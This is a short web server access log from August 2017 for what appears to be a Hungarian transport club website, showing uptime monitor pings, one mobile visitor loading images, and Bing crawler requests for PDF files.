88.99.187.152 - - [30/Aug/2017:22:39:06 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:22:44:06 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:22:49:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
221.11.230.6 - - [30/Aug/2017:22:50:03 +0200] "GET / HTTP/1.1" 200 2023 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1"
37.76.75.3 - - [30/Aug/2017:22:52:41 +0200] "GET / HTTP/1.1" 200 2023 "http://www.google.hu/search?q=k%C3%B6zleked%C3%A9si+klub&oq=k%C3%B6zleked%C3%A9si+klub&gs_l=mobile-heirloom-serp.12..0.1624.3800.0.4276.6.6.0.0.0.0.235.1215.0j3j3.6.0....0...1.1.34.mobile-heirloom-serp..0.6.1211.imaKFeYacRo" "Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 735) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537"
37.76.75.3 - - [30/Aug/2017:22:52:41 +0200] "GET /blog.jpg HTTP/1.1" 200 29833 "http://www.mkk.zpok.hu/" "Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 735) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537"
37.76.75.3 - - [30/Aug/2017:22:52:41 +0200] "GET /mkk_banner.png HTTP/1.1" 200 62097 "http://www.mkk.zpok.hu/" "Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 735) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537"
37.76.75.3 - - [30/Aug/2017:22:52:41 +0200] "GET /facebook-logo-preview.png HTTP/1.1" 200 3924 "http://www.mkk.zpok.hu/" "Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 735) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537"
88.99.187.152 - - [30/Aug/2017:22:54:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:22:59:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
157.55.39.219 - - [30/Aug/2017:22:59:22 +0200] "GET /doc/allomasok_kepes_osszefoglaloja.pdf HTTP/1.1" 200 5628186 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
88.99.187.152 - - [30/Aug/2017:23:04:06 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:23:09:06 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:23:14:06 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:23:19:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:23:24:06 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:23:29:06 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:23:34:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
157.55.39.123 - - [30/Aug/2017:23:34:30 +0200] "GET /doc/A_kozlekedesmenedzsment_korszeru_eszkozei.pdf HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
88.99.187.152 - - [30/Aug/2017:23:39:06 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:23:44:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
157.55.39.55 - - [30/Aug/2017:23:45:33 +0200] "GET / HTTP/1.1" 200 2023 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
